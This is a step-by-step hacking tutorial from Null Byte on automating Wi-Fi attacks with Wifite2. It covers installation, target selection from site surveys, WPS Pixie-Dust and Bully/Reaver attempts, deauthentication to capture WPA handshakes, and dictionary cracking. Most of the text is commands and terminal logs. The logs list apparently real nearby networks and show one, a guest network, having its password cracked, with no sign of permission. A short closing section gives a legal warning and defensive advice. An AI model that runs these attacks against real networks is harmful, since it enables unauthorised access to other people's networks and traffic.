HOW TO Automate Wi-Fi Hacking

with Wifite2
There are many ways to attack a Wi-Fi network. The type of encryption, manufacturer
settings, and the number of clients connected all dictate how easy a target is to attack and
what method would work best. Wifite2 is a powerful tool that automates Wi-Fi hacking,
allowing you to select targets in range and let the script choose the best strategy for each
network.

Wifite2 vs. Wifite

Wifite has been around for some time and was one of the first Wi-Fi hacking tools I was
introduced to. Along with Besside-ng, automated Wi-Fi hacking scripts enabled even script
kiddies to have a significant effect without knowing much about the way the script worked.
Compared to Besside-ng, the original Wifite was very thorough in using all available tools to
attack a network, but it could also be very slow.

One of the best features of the original Wifite was the fact that it performed a Wi-Fi site
survey before attacking nearby networks, allowing a hacker to easily designate one, some, or
all nearby networks as targets. By laying out available targets in an easy to understand
format, even a beginner could understand what attacks might work best against nearby
networks.

 Don't Miss: Automating Wi-Fi Hacking with Besside-ng

The original Wifite would automatically attack WPA networks by attempting to capture a
handshake or by using the Reaver tool to brute-force the WPS setup PIN of nearby networks.
While this method was effective, it could prove to take 8 hours or more to complete.

The updated WiFite2 is much faster, churning through attacks in less time and relying on
more refined tactics than the previous version. Because of this, Wifite2 is a more serious and
powerful Wi-Fi hacking tool than the original Wifite.

Attack Flow for Wi-Fi Hacking

Wifite2 follows a simple but effective workflow for hacking nearby networks as rapidly as
possible. To do so, it pushes each tactic it tries to the practical limit, even going to far as to
try to crack any handshakes it retrieves.

In the first step, Wifite2 scans across all channels looking for any network in range. It ranks
these networks it discovers by signal strength, as a network being detected does not ensure
you can reliably communicate with it.

Organized from strongest to weakest signal strength, the reconnaissance phase involves
gathering information about what networks are around and which hacking techniques they
might be vulnerable to. Because of the way Wifite2 is organized, it's easy to add a directional
Wi-Fi antenna to use Wifite2 to locate the source of any nearby Wi-Fi network while
performing a site survey.

 Don't Miss: Hack WPA & WPA2 Wi-Fi Passwords with a Pixie-Dust Attack

After the site survey is complete, any targets displayed will show whether there are clients
connected, whether the network advertises WPS, and what kind of encryption the network is
using. Based on this, an attacker can select any target, a group of targets, or all targets to
begin an attack based on the information gathered.

Wifite2 will progress through the target list starting with fastest and easiest attacks,
like WPS-Pixie, which can result in a password being breached in seconds, on to less sure
tactics like checking for weak passwords with a dictionary attack. If an attack fails or takes
too long, Wifite2 will move on to the next applicable attack without wasting hours like its
predecessor was prone to doing.

What You'll Need

To get started, you'll need a Wi-Fi network adapter you can put into wireless monitor mode.
This means selecting one that is compatible with Kali Linux, which we have several excellent
guides on doing.

Wifite2 is installed by default on Kali Linux, so I recommend you either use Kali in a virtual
machine or dual-booted on a laptop. You can use Wifite2 on other Linux systems, but I won't
go through the installation as this guide assumes you're using Kali Linux.

 Don't Miss: Buy the Best Wireless Network Adapter for Wi-Fi Hacking in 2019

Step 1Install Wifite2

If you don't have Wifite2 installed on your system already, you can do so from the GitHub
repository. First, you can clone the repository by opening a terminal window and typing the
following commands.

git clone https://github.com/derv82/wifite2.git

cd wifite2
sudo python setup.py install

This should download and install Wifite2 on your system. To test if it worked, you can
type wifite -h to see information about the version installed.

wifite -h

. .
.´ · . . · `. wifite 2.1.6
: : : (¯) : : : automated wireless auditor
`. · ` /¯\ ´ · .´ https://github.com/derv82/wifite2
 ` /¯¯¯\ ´

optional arguments:
-h, --help show this help message and exit

SETTINGS:
-v, --verbose Shows more options (-h -v). Prints commands and
outputs. (default: quiet)
-i [interface] Wireless interface to use (default: choose first or
ask)
-c [channel] Wireless channel to scan (default: all channels)
-mac, --random-mac Randomize wireless card MAC address (default: off)
-p [scantime] Pillage: Attack all targets after scantime seconds
--kill Kill processes that conflict with Airmon/Airodump
(default: off)
--clients-only, -co Only show targets that have associated clients
(default: off)
--nodeauths Passive mode: Never deauthenticates clients
(default: deauth targets)

WEP:
--wep Filter to display only WEP-encrypted networks
(default: off)
--require-fakeauth Fails attacks if fake-auth fails (default: off)
--keep-ivs Retain .IVS files and reuse when cracking (default:
off)

WPA:
--wpa Filter to display only WPA-encrypted networks
(includes WPS)
--new-hs Captures new handshakes, ignores existing handshakes
in ./hs (default: off)
--dict [file] File containing passwords for cracking (default:
/usr/share/wordlists/fern-wifi/common.txt)

WPS:
--wps Filter to display only WPS-enabled networks
--bully Use bully instead of reaver for WPS attacks
(default: reaver)
 --no-wps NEVER use WPS attacks (Pixie-Dust) on non-WEP
networks (default: off)
--wps-only ALWAYS use WPS attacks (Pixie-Dust) on non-WEP
networks (default: off)

EVIL TWIN:
-ev, --eviltwin Use the "Evil Twin" attack against all targets
(default: off)

COMMANDS:
--cracked Display previously-cracked access points
--check [file] Check a .cap file (or all hs/*.cap files) for WPA
handshakes
--crack Show commands to crack a captured handshake

Step 2Plug in Your Wi-Fi Card

With Wifite2 installed on your system, you'll need to plug in your Kali Linux-compatible
wireless network adapter. Wifite2 takes care of not only auto-selecting a wireless network
adapter to use but also puts that wireless card into monitor mode for you, meaning you don't
need to do anything after plugging in the adapter.

Step 3Set Flags & Find a Target

If we know what channel we're attacking on, we can select it by adding the -ccommand
followed by the channel number. Other than that, running Wifite2 is as simple as
typing wifite and letting the script gather information.

wifite -c 11

. .
.´ · . . · `. wifite 2.1.6
: : : (¯) : : : automated wireless auditor
`. · ` /¯\ ´ · .´ https://github.com/derv82/wifite2
` /¯¯¯\ ´

[+] option: scanning for targets on channel 11

[!] conflicting process: NetworkManager (PID 464)
[!] conflicting process: wpa_supplicant (PID 729)
[!] conflicting process: dhclient (PID 13595)
[!] if you have problems: kill -9 PID or re-run wifite with --kill)
 [+] looking for wireless interfaces

Interface PHY Driver Chipset

-----------------------------------------------------------------------
1. wlan0 phy3 ath9k_htc Atheros Communications, Inc.
AR9271 802.11n

[+] enabling monitor mode on wlan0... enabled wlan0mon

NUM ESSID CH ENCR POWER WPS? CLIENT

--- ------------------------- --- ---- ----- ---- ------
1 Suicidegirls 11 WPA 48db no
2 Bourgeois Pig Guest 11 WPA 45db no
3 BPnet 11 WPA 42db no
4 DirtyLittleBirdyFeet 11 WPA 32db no 5
5 ATT73qDwuI 11 WPA 32db yes
6 SpanishWiFi 11 WPA 24db no
7 Franklin Lower 11 WPA 20db no 3
8 Sonos 11 WPA 11db no
9 Villa Carlotta 11 WPA 11db no
10 Sonos 11 WPA 10db no
[+] select target(s) (1-10) separated by commas, dashes or all:

Here, we executed a scan on channel 11 and found 10 different targets. Of those targets, two
have clients connected, one has WPS enabled, and all are using WPA security.

Step 4Examine the Site Survey & Choose Targets

From our test survey, we can see that target number 5 may present the best target. While the
signal strength isn't the best, and there aren't any clients connected, we can probably get a
handshake with the new PMKID attack even if no one is connected.

If we're looking for weak passwords, the first three networks have the strongest signal
strength, while targets 4 and 7 have the best chance of scoring a quick four-way handshake to
try brute-forcing later. If we're targeting a particular network, now is when we can select it. If
we want to pick the most likely networks, we might select targets 4, 5, and 7 for the
likelihood of a fast handshake being captured and cracked, if the WPS PIN isn't cracked first.

 Don't Miss: Disable Security Cam s on Any Wireless Network with Aireplay-Ng

If we want to focus on easy targets, we can tell the script to only display targets vulnerable to
a certain kind of attack. To show only targets with WPS that might be vulnerable
to Reaver or Bully attacks, we can run Wifite2 with the -wps flag.
wifite -wps

. .
.´ · . . · `. wifite 2.1.6
: : : (¯) : : : automated wireless auditor
`. · ` /¯\ ´ · .´ https://github.com/derv82/wifite2
` /¯¯¯\ ´

[+] option: targeting WPS-encrypted networks

[!] conflicting process: NetworkManager (PID 464)
[!] conflicting process: wpa_supplicant (PID 729)
[!] conflicting process: dhclient (PID 14824)
[!] if you have problems: kill -9 PID or re-run wifite with --kill)

[+] looking for wireless interfaces

Interface PHY Driver Chipset

-----------------------------------------------------------------------
1. wlan0 phy4 ath9k_htc Atheros Communications, Inc.
AR9271 802.11n

[+] enabling monitor mode on wlan0... enabled wlan0mon

NUM ESSID CH ENCR POWER WPS? CLIENT

--- ------------------------- --- ---- ----- ---- ------
1 SBG6580E8 1 WPA 45db yes
2 The Daily Planet 1 WPA 30db yes 1
3 ATT73qDwuI 11 WPA 28db yes
4 birds-Wireless 2 WPA 23db yes
[+] select target(s) (1-4) separated by commas, dashes or all:

We can do the same with -wpa or -wep to only show targets matching these types of
encryption.

Step 5Automate Attacks by Target Type

From our results list, let's select a target with both WPS enabled and clients attached. After
selecting the number of the network we wish to attack, Wifite2 will proceed through the most
expedient attacks against the network.

[+] (1/1) starting attacks against 69:96:43:69:D6:96 (The Daily Planet)

 [+] The Daily Planet (76db) WPS Pixie-Dust: [--78s] Failed: Timeout after
300 seconds
[+] The Daily Planet (52db) WPA Handshake capture: Discovered new client:
C8:E0:EB:45:CD:45
[+] The Daily Planet (35db) WPA Handshake capture: Listening. (clients:1,
deauth:11s, timeout:7m59s)

[+] successfully captured handshake

[+] saving copy of handshake to
hs/handshake_TheDailyPlanet_69:96:43:69:D6:96_2018-12-24T00-33-18.cap saved

[+] analysis of captured handshake file:

[+] tshark: .cap file contains a valid handshake for 69:96:43:69:D6:96
[!] pyrit: .cap file does not contain a valid handshake
[+] cowpatty: .cap file contains a valid handshake for (The Daily Planet)
[+] aircrack: .cap file contains a valid handshake for 69:96:43:69:D6:96

[+] Cracking WPA Handshake: Using aircrack-ng via common.txt wordlist

[!] Failed to crack handshake: common.txt did not contain password

[+] Finished attacking 1 target(s), exiting

Here, we can see that while the WPS-Pixie attack failed, we were able to easily grab and
attack a handshake. The WPS-Pixie attack timed out pretty quickly, so we wasted a minimum
of time exploring this avenue of attack. Sometimes, different wireless cards work better with
different scripts, and this is true with Reaver and Bully. If one isn't working for you, try the
other.

Wifite2 uses Reaver by default, but you can change this to Bully by using the -bullyflag.

wifite -wps -bully

. .
.´ · . . · `. wifite 2.1.6
: : : (¯) : : : automated wireless auditor
`. · ` /¯\ ´ · .´ https://github.com/derv82/wifite2
` /¯¯¯\ ´

[+] option: use bully instead of reaver for WPS Attacks

[+] option: targeting WPS-encrypted networks
[!] conflicting process: NetworkManager (PID 464)
 [!] conflicting process: wpa_supplicant (PID 729)
[!] conflicting process: dhclient (PID 14824)
[!] if you have problems: kill -9 PID or re-run wifite with --kill)

[+] looking for wireless interfaces

using interface wlan0mon (already in monitor mode)
you can specify the wireless interface using -i wlan0

NUM ESSID CH ENCR POWER WPS? CLIENT

--- ------------------------- --- ---- ----- ---- ------
1 SBG6580E8 1 WPA 46db yes
2 The Daily Planet 1 WPA 34db yes 1
[+] select target(s) (1-2) separated by commas, dashes or all: 2

[+] (1/1) starting attacks against 78:96:84:00:B5:B0 (The Daily Planet)

[+] The Daily Planet (44db) WPS Pixie-Dust: [4m0s] Failed: More than 100
timeouts
[+] The Daily Planet (34db) WPA Handshake capture: found existing
handshake for The Daily Planet
[+] Using handshake from hs/handshake_TheDailyPlanet_78-96-84-00-B5-
B0_2018-12-24T00-33-18.cap

[+] analysis of captured handshake file:

[+] tshark: .cap file contains a valid handshake for 78:96:84:00:b5:b0
[!] pyrit: .cap file does not contain a valid handshake
[+] cowpatty: .cap file contains a valid handshake for (The Daily Planet)
[+] aircrack: .cap file contains a valid handshake for 78:96:84:00:B5:B0

[+] Cracking WPA Handshake: Using aircrack-ng via common.txt wordlist

[!] Failed to crack handshake: common.txt did not contain password

[+] Finished attacking 1 target(s), exiting

While we didn't have a better result with Bully, trying both is a good way of figuring out
which your wireless network adapter works best with.

Step 6Skip & Examine Results

If Wifite2 is taking too long on any particular attack, we can always skip the current attack by
pressing Ctrl-C to bring up a menu that asks if we'd like to continue. Here, you can skip to
the next attack by pressing c, or type s to stop Wifite2.
[+] SBG6580E8 (47db) WPS Pixie-Dust: [4m52s] Trying PIN 12523146
(DeAuth:Timeout) (Timeouts:15)
[!] interrupted

[+] 1 attack(s) remain, do you want to continue?

[+] type c to continue or s to stop:

If we're only able to get a four-way handshake, then we may want to add a custom dictionary
list of password guesses to try and crack the handshake. We can do this by setting the --
dict flag to set the file containing passwords for cracking, the default being set to
/usr/share/wordlists/fern-wifi/common.txt. This password list contains many common
passwords, but you'll want to use your own if you're serious about getting results.

Below, we successfully decrypt a captured handshake by using a custom dictionary

"passwords.txt."

wifite -wpa --dict ./passwords.txt

. .
.´ · . . · `. wifite 2.1.6
: : : (¯) : : : automated wireless auditor
`. · ` /¯\ ´ · .´ https://github.com/derv82/wifite2
` /¯¯¯\ ´

[+] option: using wordlist ./passwords.txt to crack WPA handshakes

[+] option: targeting WPA-encrypted networks
[!] conflicting process: NetworkManager (PID 419)
[!] conflicting process: wpa_supplicant (PID 585)
[!] conflicting process: dhclient (PID 7902)
[!] if you have problems: kill -9 PID or re-run wifite with --kill)

[+] looking for wireless interfaces

using interface wlan0mon (already in monitor mode)
you can specify the wireless interface using -i wlan0

NUM ESSID CH ENCR POWER WPS? CLIENT

--- ------------------------- --- ---- ----- ---- ------
1 Suicidegirls 11 WPA 58db n/a
2 Bourgeois Pig Guest 11 WPA 56db n/a
3 BPnet 11 WPA 56db n/a
4 The Daily Planet 1 WPA 49db n/a 1
5 SBG6580E8 1 WPA 49db n/a
 6 Hyla Hair 2.4G 8 WPA 48db n/a
7 TWCWiFi-Passpoint 1 WPA 46db n/a
8 HP-Print-B9-Officejet... 1 WPA 40db n/a
9 birds-Wireless 2 WPA 39db n/a
10 SpanishWiFi 11 WPA 38db n/a
[!] Airodump exited unexpectedly (Code: 0) Command: airodump-ng wlan0mon
-a -w /tmp/wifitei_l5H1/airodump --write-interval 1 --output-format
pcap,csv
[+] select target(s) (1-10) separated by commas, dashes or all: 2

[+] (1/1) starting attacks against DE:F2:86:EC:CA:A0 (Bourgeois Pig

Guest )
[+] Bourgeois Pig Guest (57db) WPA Handshake capture: Discovered new
client: F0:D5:BF:BD:D5:2B
[+] Bourgeois Pig Guest (58db) WPA Handshake capture: Discovered new
client: 6C:8D:C1:A8:E4:E9
[+] Bourgeois Pig Guest (59db) WPA Handshake capture: Listening.
(clients:2, deauth:14s, timeout:8m1s)

[+] successfully captured handshake

[+] saving copy of handshake to hs/handshake_BourgeoisPigGuest_DE-F2-86-
EC-CA-A0_2018-12-24T01-40-28.cap saved

[+] analysis of captured handshake file:

[+] tshark: .cap file contains a valid handshake for de:f2:86:ec:ca:a0
[!] pyrit: .cap file does not contain a valid handshake
[+] cowpatty: .cap file contains a valid handshake for (Bourgeois Pig
Guest )
[+] aircrack: .cap file contains a valid handshake for DE:F2:86:EC:CA:A0

[+] Cracking WPA Handshake: Using aircrack-ng via passwords.txt wordlist

[+] Cracking WPA Handshake: 100.00% ETA: 0s @ 2234.0kps (current key:
christmasham)
[+] Cracked WPA Handshake PSK: christmasham

[+] Access Point Name: Bourgeois Pig Guest

[+] Access Point BSSID: DE:F2:86:EC:CA:A0
[+] Encryption: WPA
[+] Handshake File: hs/handshake_BourgeoisPigGuest_DE-F2-86-EC-CA-
A0_2018-12-24T01-40-28.cap
 [+] PSK (password): christmasham
[+] saved crack result to cracked.txt (1 total)
[+] Finished attacking 1 target(s), exiting

By adding a good password file, we can improve our chances of cracking a Wi-Fi network
password even if the faster WPS attacks fail.

Some Practical Warnings & Defenses

Wifite2 is an example of how even script kiddies can be effective against networks with
common vulnerabilities like WPS setup PINs and weak passwords. With an increasing
amount of the more advanced attacks becoming automated, it's critical that you learn about
the most common and effective ways of attacking a Wi-Fi network.

In general, the best way to defend your network from tools like Wifite2 is to make sure you
have WPS disabled and pick a very strong password for your Wi-Fi network that you don't
share with anyone you don't need to.

It's important to note that by selecting "all" in a target list, Wifite2 will attack all of the
networks it has detected, not just the ones you have permission to attack. You must have
permission to use this tool on any network you attack, as attacking a network belonging to
someone else without permission is a crime and can get you in a lot of trouble. Saying the
script did it isn't an excuse if you're caught attacking an important network, so be sure to keep
Wifite2 targeted on networks you have permission to audit.

I hope you enjoyed this guide to automating Wi-Fi hacking with Wifite2! If you have any
questions about this tutorial on Wi-Fi hacking tools or you have a comment, feel free to write
it below in the comments or reach me on Twitter @KodyKinzie.

 Follow Null Byte on Twitter, Flipboard, and YouTube

 Sign up for Null Byte's weekly newsletter
 Follow WonderHowTo on Facebook, Twitter, Pinterest, and Flipboard

Cover photo by Kody/Null Byte